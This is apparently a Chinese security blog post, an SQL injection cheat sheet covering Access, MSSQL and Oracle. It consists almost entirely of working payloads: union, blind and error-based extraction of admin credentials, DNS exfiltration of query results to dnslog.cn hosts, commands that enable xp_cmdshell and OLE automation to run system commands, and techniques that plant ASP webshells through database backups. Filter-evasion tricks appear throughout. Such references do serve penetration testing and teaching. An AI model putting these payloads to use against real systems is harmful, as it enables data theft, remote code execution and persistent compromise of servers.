珂技系列之一篇就够了——access,oracle,mssql注入 – 作者:sonomon

读这篇文章之前，建议先读

珂技系列之一篇就够了——mysql注入

因为很多注入技巧都是相通的。

一、 Access注入

Access是轻量级数据库，特点是只有单个库，没有用户，单文件即可存储数据，在SQL注入时必须猜测表名和列名。
Access只有联合注入和布尔盲注。

1，联合注入

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

2，布尔盲注

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97

3，如何查询第二行的值。

id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin

4，access猜列名的一些特殊解法

利用having爆列

select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1,id group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1

偏移注入，需要猜到一个列名，一般是id

id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)

移位溢注

id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin

联合使用，必须总列数是admin列的4倍，上述总列数22个，admin列6个，不满足条件。假设admin列4个如下。

select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)

5，一些tips

access空白符，%20，%09，%0A，%0C，%0D
注释，没有官方注释，但是有注释符号，%16，%00
IIS特殊用法
允许出现%，比如uni%on select
允许Unicode编码，比如%u0075%u006eion select
这里和和json格式类似，{“id”:”\u0031″}
双参数则用逗号拼接，id=1&id=2则为id=1,2
所以可以这样id=1 and/*&id=*/1=1

如何getshell

直连导出，备份getshell，需要IIS6解析漏洞

select * into [a] in 'E:\1.asp;.xls' 'excel 4.0;' from admin

如果数据库文件(.mdb)可解析，在任意值插入【┼攠數畣整爠煥敵瑳∨≡┩愾】，可以解析成<%eval request (“a”)%>

列名和表名可被包裹

select(password)from(admin)
select[password]from[admin]
select`password`from`admin`

无select注入

id = 39 and asc(mid(dfirst("password","admin"),1,1))=97
select dfirst(1,"admin")
select dfirst("password","admin")
select dfirst("[password]","[admin]","id=40")
select dlast("[password]","[admin]")

此外还有dlookup，dmin，dmax，dcount可用
其他davg，dsum，DStDev，DStDevP，DVar，DVarP只能数字类型
其他字符串比较函数

id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a')
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a48e190fafc')

二、 mssql注入

1，联合注入

http://127.0.0.1/1.aspx?id=1 order by 4
http://127.0.0.1/1.aspx?id=-1 union select 1,2,3,4
http://127.0.0.1/1.aspx?id=-1 union all select null,null,null,null
http://127.0.0.1/1.aspx?id=-1 union all select null,db_name(),null,null

查库，前六个都是系统库

(select name from master.dbo.sysdatabases where dbid=7)

指定test库查第一个表

(select top 1 name from test.dbo.sysobjects where xtype='U')

查当前库第一个表

(select top 1 name from sysobjects where xtype='U')

查当前库第二个表

(select top 1 name from sysobjects where xtype='U' and name not in ('admin'))

查当前库所有表

(select name from sysobjects where xtype='U' FOR XML PATH(''))

查列

(select top 1 name from syscolumns where id=object_id('admin'))

用|隔开查所有列

(select '|'%2bname%2b'|' from syscolumns where id=object_id('admin') FOR XML PATH(''))

快速变化0来查列

(select top 1 name from syscolumns where id=object_id('admin') and name not in (select top 0 name from syscolumns where id=object_id('admin')))

查所有值

(select password+username from admin FOR XML PATH(''))

mysql方式查表列

(select top 1 table_name from information_schema.tables)
(select top 1 column_name from information_schema.columns where table_name='admin')

子查询如果无法使用，可能需要带入exists()函数

2，报错注入

mssql非常容易报错注入，只需要把字符串和数字比较即可

http://127.0.0.1/1.aspx?id=@@version
http://127.0.0.1/1.aspx?id=1 and @@version=1
http://127.0.0.1/1.aspx?id=1 and 1=convert(int,@@version)
http://127.0.0.1/1.aspx?id=1 and 1=cast(@@version as int)
http://127.0.0.1/1.aspx?id=1%2bUSER_NAME(@@version)

这里USER_NAME()可被SUSER_NAME() PERMISSIONS() DB_NAME() FILE_NAME() TYPE_NAME() COL_NAME()代替

3，盲注

布尔盲注

http://127.0.0.1/1.aspx?id=1 and ascii(substring((select user),1,1))=100

时间盲注

http://127.0.0.1/1.aspx?id=1;if(ascii(substring((select user),1,1)))=100 WAITFOR DELAY '0:0:5'
select * from admin where id = 1 if 1=2 WAITFOR DELAY '0:0:5'

dnslog注入，必须sa，堆叠的方式
原理是用xp_subdirs，xp_dirtree, xp_fileexist，读取smb共享域名。也有用OpenRowset()和OpenDatasource()的办法，这两个函数为远程加载其他mssql数据库，默认关闭。

declare @host varchar(1024);
select @host=convert(varchar(1024),db_name())+'.vj0r9q.dnslog.cn';
exec('master..xp_subdirs "\\'+@host+'"');

或者

exec('master..xp_dirtree "\\'+@host+'"');
exec('master..xp_fileexist "\\'+@host+'\test"');

dnslog无需堆叠的方法

and exists(select * from fn_xe_file_target_read_file('C:\Windows\win.ini','\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_get_audit_file('\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_trace_gettable('\\'+(select user)+'.xrjff0.dnslog.cn\1.trc',null))

4，堆叠注入

mssql常见堆叠注入，相当于直连数据库，直接进行增删改查，如果有sa权限，还可以利用扩展进行进一步利用。
堆叠注入，可以用declare和exec进行无select注入

declare @s varchar(2000) set @s=0x73656C6563742031 exec(@s)

5，堆叠注入下的扩展运用

xp_cmdshell，命令执行，高版本默认关闭，但可以打开

Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Exec master.dbo.xp_cmdshell 'whoami';

无需堆叠执行xp_cmdshell的两种方法

id=1 if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell''whoami''');

openrowset 2005以后默认关闭，需要先打开才能无堆叠执行xp_cmdshell，还可以用来读文件。

exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''calc''')
select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)

sp_OACreate和sp_oacreate，可以用来命令执行，文件操作，无回显

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >D:\\1.txt'
DECLARE @Result int;DECLARE @FSO_Token int;EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT;EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'D:\1.txt';EXEC @Result = sp_OADestroy @FSO_Token;
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:\1.txt', 'D:\2.txt';
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:\1.txt', 'D:\2.txt';
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out;exec sp_oamethod @o, 'copyfile',null,'D:\1.txt' ,'D:\2.txt';
declare @o int;exec sp_oacreate 'Shell.Application', @o out;exec sp_oamethod @o, 'ShellExecute',null,'C:\windows\system32\calc.exe';

Agent Job执行命令

USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt', @retry_attempts = 1, @retry_interval = 5 ;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';

CLR程序集

https://xz.aliyun.com/t/6682

沙盒执行命令（仅限低版本）

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

sp_makewebtask（仅限低版本）

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;
exec sp_makewebtask 'D:\1.asp','select''<%execute(request("a"))%>'' ';

xp_dirtree和xp_subdirs，列文件，还有xp_fileexist确定文件是否存在

execute master..xp_dirtree 'c:',1,1
execute master..xp_subdirs 'c:'
execute master..xp_fileexist 'D:\test.txt'

xp_regenumvalues，xp_regread，xp_regwrite，xp_regdeletevalue，xp_regdeletekey，注册表操作。

exec xp_regenumvalues'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
EXEC master..xp_regenumvalues 'HKEY_CURRENT_USER','Control Panel\International','sCountry';

sp_helpextendedproc，查看全部扩展

EXEC master..sp_helpextendedproc

xp_availablemedia，查看驱动器

exec master..xp_availablemedia

xp_logininfo，xp_enumgroups，查看计算机用户和组

exec xp_logininfo

sp_who2，查看登录账户

EXEC master..sp_who2

sp_addlinkedserver和sp_addlinkedsrvlogin
可登陆其他mssql，Oracle

6，文件读取和写入

BULK INSERT文件读取

create table #testtable(context ntext);
BULK INSERT #testtable FROM 'D:/test.txt' WITH (DATAFILETYPE = 'char',KEEPNULLS);
select * from #testtable;drop table #testtable;

数据库备份

create table [bin_cmd]([cmd] [image]);
declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;
insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');
declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='E:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;
drop table [bin_cmd];

日志备份

create table [bin_cmd]([cmd] [image]);
declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;
insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');
declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;
drop table [bin_cmd];

7，一些tips

mssql自带函数
@@version  system_user  suser_sname()  user db_name()  host_name() 
mssql空白符
%01-%20都为空白符，–和/**/为注释，%00也可充当注释符
混淆关键字

id=0xunion select\Nnull,null,null,null from.admin

避免使用引号

(select top 1 name from syscolumns where id=object_id('admin'))
(select top 1 name from syscolumns where id=object_id(char(97)+char(100)+char(109)+char(105)+char(110)))

爆出当前完整语句

id=1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null

三、 oracle注入

1，联合注入

必须使用null，oracle select必须带一个虚拟表 from dual

http://luoke.cn:81/oracle.php?id=1 order by 3
http://luoke.cn:81/oracle.php?id=-1 union select null,(select user from dual),null from dual

当前库名

select name from v$database

ip地址，ipv6

select utl_inaddr.get_host_address from dual

用户权限

select privilege from session_privs where rownum=1

查库

select owner from all_tables where rownum=1

查其他库

select owner from all_tables where rownum=1 and owner <>'SYS'

查第一个表

select table_name from user_tables where rownum=1

快速查询第二个表

select table_name from (select rownum r, table_name from user_tables order by table_name) WHERE r=2

查询第一个列

select column_name from user_tab_columns where rownum=1 and table_name='admin'

查询第一个值

select concat(username,password) from admin where rownum=1
select username||password from admin where rownum=1

2，报错注入

oracle报错注入也很简单，字符串和数字比较或者is not null即可

and 1=utl_inaddr.get_host_name((select user from dual))
and 1=ctxsys.drithsx.sn(1,(select user from dual))
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null

3，盲注

布尔盲注，decode和if一样

and 6=length(user)
and 83=(select ascii(substr((select user from dual),1,1)) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),1,0) from dual)

时间盲注

and 1=(select decode(substr((select user from dual),1,1),chr(83),DBMS_PIPE.RECEIVE_MESSAGE(CHR(78),2),0) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),(select count(*) from all_objects),0) from dual)

(select count(*) from all_objects)是类似mysql笛卡尔积的高耗时操作，如果时间不明显，可以(select count(*) from all_objects)||(select count(*) from all_objects)加倍时间
dnslog盲注

and utl_http.request('http://'||(select user from dual)||'.0n7kdm.dnslog.cn/')=1
and UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.7vkm67.dnslog.cn')=1

4，oracle tips

Oracle空白符%00 %0A %0D %0C %09 %20
注释，同样支持/**/和–
避免使用引号

and user='SYSTEM'
and user=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)

来源：freebuf.com 2021-01-22 09:21:30 by: sonomon